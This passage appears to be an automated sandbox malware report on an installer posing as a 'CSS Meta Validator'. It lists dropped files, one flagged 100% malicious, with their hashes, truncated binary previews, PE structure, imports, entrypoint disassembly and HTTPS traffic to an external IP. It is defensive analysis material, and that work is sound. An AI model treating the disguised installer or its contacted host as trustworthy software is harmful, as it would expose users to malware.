Preview:	.PNG........IHDR...............+... .IDATx^.....YY...Tw..LfI....df....&..Q..l.V......(..+......WTT.....-...P.M...YTHv....f.d..L6..u?..YY.....Su~...'{.:.y...f..Sb. .... .@b..*./.......~S...7Q.].off..?OLL\.....+..g..s..+...'....g.....?.FU.^c.%c.....1fEU..s..W...{..........b.........Z.. ..E.^..U.. .....x...qb.L.... ...._......... .....x!...1..k.X,.....yY.h.r.???/......MM......o....H..E..Xo...l6...r...^[[..m..ApO>..guu5..p1.`.....@.......J%.....@.'.....^...m....p..233....\.w.">...N.^\\\|.1..;=?..T..c..@..:..........b.8366voR.1/.. .......p.:.... .S......Z..DQ$g..v..%q.....O.O...TU/..ic.)U=-"..s..&A.\...VO.`p..@........`Q.....@.;..w.~bb.>.....}wd.YXXx....[.i......c.6.\i..Z...".;...'''....".... ....v.8....@.i.#G....r.u..X,..B!..r..{.b...h.OU.D..c..V..\.w...i.!hG.c.@...\....je.....@.!.\.woQ.....m.............B.#r".. ...}....'h.A....hO`.{......e...~{~..E..]....7....8...._.bC..8....@...4...... .....x..}{...\Z.4..V..._%P..........Q...[.L.... ..........

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10532352
Entropy (8bit):	6.6035389772335265
Encrypted:	false
SSDEEP:	98304:zihKeDg7JMqrr43ls1WcIiy36CpnNZ6zk9zYAl3P43N4tGqFbd3HuLeLunGrfSTT:IRBqnE50ytnNUAl/40RHZMEfWtR
MD5:	A0052D6EAC0D6D4296DE89213447416D
SHA1:	2F3ED143855A0490D8E3EC564FE27A3F72FA4916
SHA-256:	C57A1C9570FF6CEFF0A08770A142C348B5B3E5B2C03417C03C0FBFFB7707069F
SHA-512:	0352C179F4D2F6E5CEAA116B885203E613662F6D93D9AE7B2FC8FC0FAF89DD4889A66C5D4DA9D12CC8D38D7BB4E38A116E9A0E4F629E51979D07EA7EB4996D61
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........1:.._i.._i.._i..i.._i&(.i.._i&(.i.._i..\h.._i..[h.._i..Zh.._i..^h.._ia.^h.._i..^i.._i..Zh.._iN.Vh.._iN.Zh.._iN.[h.._iN._h.._iN..i.._i...i.._iN.]h.._iRich.._i....7...6...7.......7...Rich6...........PE..L...-6ua.................hl..J4.......c.......l...@.......................................@............................................0h......................H~...i..T....................j.......i..@.............l..............................text...-fl......hl................. ....rdata...\|$...l..~$..ll.............@..@.data...P..........................@....rsrc...0h.......j.................@..@.reloc..H~...........6..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\libEGL.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	109056
Entropy (8bit):	6.49594862756501
Encrypted:	false
SSDEEP:	3072:cM7DNjsmbZIwfTCR7GrVXFb5Q3jaZRUjF0rQDGYoM:XX7CRwVh5QsRKDGxM
MD5:	E4B0061BFC552111AA9F6A63AC61B1B9
SHA1:	2F4F9A0E179EB17FF077C3BBA30C09E1EA0E0C0F
SHA-256:	17C8685F54EFD76AE5C3171F146910772B49A3D733CDA66E2FBC5C64CE800214
SHA-512:	978D41141967FDBD509D081F1FB107F13C61EABB4E13712D7D4FEF51997AD0273F211901AD46E0A352770FD849F15B878AFF1B02B3600880160D1213DC9B53A4
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...PC.^.........."!.................'....................................................@....................................(....... .......................l....~...............................(...............................................text............................... ..`.rdata...t... ...v..................@..@.data...............................@....00cfg..............................@..@.voltbl.d................................rsrc... ...........................@..@.reloc..l...........................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\qclp2.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4254720
Entropy (8bit):	6.929231407239177
Encrypted:	false
SSDEEP:	49152:nJ6Wv9ViKjOpvDNXbqgf5gHUkphV7DkzigZAIcn2vjkMcRc/s+kobXnz/q/xnd/s:nJ6Wv9VBS9DJxzIV7Dkms5ZVQa
MD5:	7FC7D8096392A3887F53F85A570137C6
SHA1:	18822D95CDB79D25ACFCFFED8395CC208AA03D04
SHA-256:	F6B6D5C0EA15112F428A83B923B879EC43AA54D7677AD29E763532881509DEED
SHA-512:	CAC312C0700EACFF4A2FFAAB844275AC9D0093C64AA1C74D4A94822D02117E3A55BA1310500B4D1024DCB075720B9FFB2DCD0FDBCF8748C72A4890E24D53E7C0
Malicious:	false
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........1:.._i.._i.._i..i.._i&(.i.._i&(.i.._i..\h.._i..[h.._i..Zh.._i..^h.._ia.^h.._i..^i.._i..Zh.._iN.Vh.._iN.Zh.._iN.[h.._iN._h.._iN..i.._i...i.._iN.]h.._iRich.._i'y......'y......Rich....................PE..L...18ua...........!................)b....... ................................A......=@...@...........................;.H.....;.T.....>..k....................?.....p.:.......................:.......:.@............ ...............................text............................... ..`.rdata....... ......................@..@.data........ <..`....<.............@....rsrc....k....>..l...j=.............@..@.reloc........?.......>.............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\zmq Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PDF document, version 1.5
Category:	dropped
Size (bytes):	442111
Entropy (8bit):	7.994446353856369
Encrypted:	true
SSDEEP:	6144:aorUBWkDwzCvAmehaITUjbhl+jG8xgGS21gdIjuFFuybeBq//GvucNIrbRQ873vS:ahWgFomnll+ABHILycq3GGcNIrbfev
MD5:	DCED29FE7B0769AF598BE6684DD85677
SHA1:	DF5808C075F7AD586A858D1B71449C954C648A37
SHA-256:	84855FF6E0BB4BB79E4CC13B600C26633340CAA3FDEC16504E7006777213C0F4
SHA-512:	2408B866FA00EC9342BAC2223BF3092FAFFB8481BB8B0D4BBBEF4305739497211619A01DB2E8AC18563888E4755D2E36AF208459013D6BA781F4F06C00654F6E
Malicious:	false
Preview:	%PDF-1.5.%.....1 0 obj <<./Length 587 ./Filter /FlateDecode.>>.stream.x.mTM..@...+z.&...?.tBL.$..d4.......<.._...f..W._w..r..c;...`G.U.O.V.&..........[v...6.W.7..T..vb...uYt/N....5......=..S.<b...G...I(vEwv+OR8$.....6mQ.oB.J)........3.q..X.ysO'.H.)-."...}......[...<V^...[l..F.x.M..(Ob..q..Z.g..Bz.......<../V......[m..Xq.Y...g..'.R.D.....?k3.q8~.J.....#........8.}.RC.g..%.P...)..{.4..".a/.. .C..^.@..8YC..%Md_b.g..4..L.0^.O....\.......p..g...\...8~.s..3.....{M...Nq7.,j.6..f-.S.A.'..A.!.:.O...L.0...x/i.dB.n..^.ySS.W.+%={.I.b.......o..k.....c.6\|f...3.4.{...p.Y.d.r...K.+H..........WA..........4nfh.i0.Ei..ZW5v.&...@.I....6..endstream.endobj.2 0 obj <<./Length 598 ./Filter /FlateDecode.>>.stream.x.mTM..@...+z.&...?.tBL.0..d4.......<..~U..f..W._u...v..c;Z..........MfG..}...I.]/....m..o.....0^'..^.x]f.kn{..EK{*..u.pg..6;..$4..;..gZ8,.....M[T.P.RJG.e.W.xm......E.7......."/....7......j;{Y..."1.t.m.\|...o.ir...I..c..>[T...En.n#....b.....

C:\Windows\Installer\530d79.msi Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2E68BFCA-136D-489B-99E7-02370AE416AC}, Number of Words: 10, Subject: CSS Validator, Author: Hemoco bvba, Name of Creating Application: Advanced Installer 18.7 build 0a7fdead, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	7775232
Entropy (8bit):	7.95100555954072
Encrypted:	false
SSDEEP:	196608:rY7cfmLhGlwa2wQiXAytyTCpj59zHpmzSTnUT4R+:rY7cfmLYwMQiXAytJ55gzSTw
MD5:	4C0F425E456ED7904F1B207FAD617EBE
SHA1:	56304F5446B7DB91314E252143E59353072A6F28
SHA-256:	A14D402C30E55AC43A83596A1D2832A730A7EB3A056E9420AC725B0EF02A176A
SHA-512:	C9AD2C0B0EBF21F7D683026689429DEF5BC5AA8DE2B3778CB1B84259CF920BF8506A55080BF7B292BE9D37C0B37398802F438C183046C0ECF6CF70D3BF396D35
Malicious:	false
Preview:	......................>...................w...................................C.......~...............................q...................................................................................................................................................................................................................................................................................................................................................................................................................;...............#...2........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...0...-......./...3...1...:...>...4...5...6...7...8...9.......<.......=...f...?...@...A...B...........E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\530d7c.msi Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2E68BFCA-136D-489B-99E7-02370AE416AC}, Number of Words: 10, Subject: CSS Validator, Author: Hemoco bvba, Name of Creating Application: Advanced Installer 18.7 build 0a7fdead, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	7775232
Entropy (8bit):	7.95100555954072
Encrypted:	false
SSDEEP:	196608:rY7cfmLhGlwa2wQiXAytyTCpj59zHpmzSTnUT4R+:rY7cfmLYwMQiXAytJ55gzSTw
MD5:	4C0F425E456ED7904F1B207FAD617EBE
SHA1:	56304F5446B7DB91314E252143E59353072A6F28
SHA-256:	A14D402C30E55AC43A83596A1D2832A730A7EB3A056E9420AC725B0EF02A176A
SHA-512:	C9AD2C0B0EBF21F7D683026689429DEF5BC5AA8DE2B3778CB1B84259CF920BF8506A55080BF7B292BE9D37C0B37398802F438C183046C0ECF6CF70D3BF396D35
Malicious:	false
Preview:	......................>...................w...................................C.......~...............................q...................................................................................................................................................................................................................................................................................................................................................................................................................;...............#...2........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...0...-......./...3...1...:...>...4...5...6...7...8...9.......<.......=...f...?...@...A...B...........E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI14BC.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Joe Sandbox View:	Filename: o4c8AUtX1g.exe, Detection: malicious, Browse Filename: farcry6_repack.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI17DA.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1C62.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	5958
Entropy (8bit):	5.682448959061152
Encrypted:	false
SSDEEP:	96:VYW1elER4Nkqt1Cpz339yBst52zKvi2tKfrz5z5zYTO166GyD9iD04c0eXIYYXlH:VYW1elER4Nkqt1Ch39+st52WvztkD14J
MD5:	77E5D1C2DBBFE347BA7AD0E9804631A7
SHA1:	C5EE351655A1F9A078EBA531A0FD492D9FC91F7A
SHA-256:	BC0A8B364763524A9FEDBDBF089D57881E0EE0DB6F3ADF132E062347B22F1C5C
SHA-512:	36A36D58A17DE1357C2D616EFF08A7C73C5B4121AC8730A37837829A080C9FA414F522BA2E2ABC5C844B777AFB35E87A9E75F41E4A10774EDE85A2DF240A2D0C
Malicious:	false
Preview:	...@IXOS.@.....@.YS.@.....@.....@.....@.....@.....@......&.{8C4E8105-89CF-42DC-B547-B756AB6C9EC5}..CSS Validator..CssValidator.msi.@.....@.. ..@.....@........&.{2E68BFCA-136D-489B-99E7-02370AE416AC}.....@.....@.....@.....@.......@.....@.....@.......@......CSS Validator......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{BACEFD7C-2242-4BDA-88CA-278EA0FBAC71}:.C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\.@.......@.....@.....@......&.{E1F4536E-7D2A-4F44-81EE-727B5F105E80}..01:\Software\Hemoco bvba\CSS Validator\Version.@.......@.....@.....@......&.{834EA0BB-8035-4ACB-9366-174CC245FFAC}C.C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\qclp2.dll.@.......@.....@.....@......&.{F40562C3-E5CF-4975-B128-0CB43DBE0174}G.C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe.@.......@.....@.....@......&.{C321E67B-035D-49DD-B4D5-

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	81287
Entropy (8bit):	5.298823419018036
Encrypted:	false
SSDEEP:	192:XL/vcrZZDZo/ZrXczaIcO/gcMH5elWSLk:XDvsDZGrkaIcO/Y5Xuk
MD5:	D3BF7F2FE7D96CF90EB3393D278780A1
SHA1:	BD85EE8A111C1314DCC2658ABCA971B037E4A016
SHA-256:	37E9A251EE2D4D666A49C8252CEFCDC9344F267463F31C1D9E8D5DBEB7912D30
SHA-512:	0040AF5B6E695D9AA089C8424728510DB1D1858DF543F802A4318422EEB6B2C29D1B1904F4B161B43EA7161EB570B4F5468CD8525C6F76B7089DFB119E6365C0
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:38:04.497 [4552]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.513 [4552]: ngen returning 0x00000000..07/23/2020 10:38:04.559 [4480]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.559 [4480]: ngen returning 0x00000000..07/23/2020 10:38:04.622 [4256]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.622 [

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.979283280048606
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yRqHWQ91dT.exe
File size:	7580858
MD5:	b50ffa06eca2b3a4d92562561fc6b2d1
SHA1:	4cdbdb338a22fd11f0fcc973598e25ba54529db3
SHA256:	a181b562122fb3752137474073f22e1b2b1b4cc82a5269e73847a0e2e212cd56
SHA512:	f96b0eb15b5d8b0162b039aa83be39059ec282d2afc11f4a4dcd0069407203a48db2438e0062c197032af3e5bd8d0694ed03d703dfb424bd145c68ccf84ebc8a
SSDEEP:	196608:r175c0ur92j0iXGqUIyBOiC5Bl7l8HiX7wTPcVW1XjYvK:r175c0ur60IGqUIyBSlBhrwTP6k
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...\|......H3............@

File Icon


Icon Hash:	f0dcdcdcdccc7830

Static PE Info

General
Entrypoint:	0x403348
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F42Ch], eax
je 00007F88C88C23B3h
push ebx
call 00007F88C88C5516h
cmp eax, ebx
je 00007F88C88C23A9h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F88C88C5492h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F88C88C238Dh
push 0000000Bh
call 00007F88C88C54EAh
push 00000009h
call 00007F88C88C54E3h
push 00000007h
mov dword ptr [0042F424h], eax
call 00007F88C88C54D7h
cmp eax, ebx
je 00007F88C88C23B1h
push 0000001Eh
call eax
test eax, eax
je 00007F88C88C23A9h
or byte ptr [0042F42Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429850h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x29b48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6457	0x6600	False	0.66823682598	data	6.43498570321	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	False	0.4625	data	5.26100389731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25538	0x600	False	0.463541666667	data	4.133728555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x30000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x29b48	0x29c00	False	0.0983345808383	data	3.11769658082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x38358	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x48b80	0x94a8	data	English	United States
RT_ICON	0x52028	0x5488	data	English	United States
RT_ICON	0x574b0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16318463, next used block 4294909696	English	United States
RT_ICON	0x5b6d8	0x25a8	data	English	United States
RT_ICON	0x5dc80	0x17a6	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x5f428	0x10a8	data	English	United States
RT_ICON	0x604d0	0x988	data	English	United States
RT_ICON	0x60e58	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x612c0	0x100	data	English	United States
RT_DIALOG	0x613c0	0x11c	data	English	United States
RT_DIALOG	0x614e0	0x60	data	English	United States
RT_GROUP_ICON	0x61540	0x84	data	English	United States
RT_VERSION	0x615c8	0x240	data	English	United States
RT_MANIFEST	0x61808	0x340	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Version Infos

Description	Data
LegalCopyright	Copyright 2021
ProductName	CSS Meta Validator
FileDescription	CSS Meta Validator
FileVersion	2.32.2.7
CompanyName	AI Internet Solutions LLC
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2021 17:08:29.337428093 CEST	49796	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.337492943 CEST	443	49796	185.98.87.196	192.168.2.5
Oct 25, 2021 17:08:29.337601900 CEST	49796	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.357414961 CEST	49796	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.357439995 CEST	443	49796	185.98.87.196	192.168.2.5
Oct 25, 2021 17:08:29.460875034 CEST	443	49796	185.98.87.196	192.168.2.5
Oct 25, 2021 17:08:29.482651949 CEST	49797	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.482693911 CEST	443	49797	185.98.87.196	192.168.2.5
Oct 25, 2021 17:08:29.482920885 CEST	49797	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.483618975 CEST	49797	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.483639956 CEST	443	49797	185.98.87.196	192.168.2.5
Oct 25, 2021 17:08:29.590574026 CEST	443	49797	185.98.87.196	192.168.2.5
Oct 25, 2021 17:08:29.592428923 CEST	49798	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.592473030 CEST	443	49798	185.98.87.196	192.168.2.5
Oct 25, 2021 17:08:29.592598915 CEST	49798	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.593012094 CEST	49798	443	192.168.2.5	185.98.87.196
Oct 25, 2021 17:08:29.593607903 CEST	443	49798	185.98.87.196	192.168.2.5
Oct 25, 2021 17:08:29.593719959 CEST	49798	443	192.168.2.5	185.98.87.196

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2021 17:07:07.918047905 CEST	61733	53	192.168.2.5	8.8.8.8
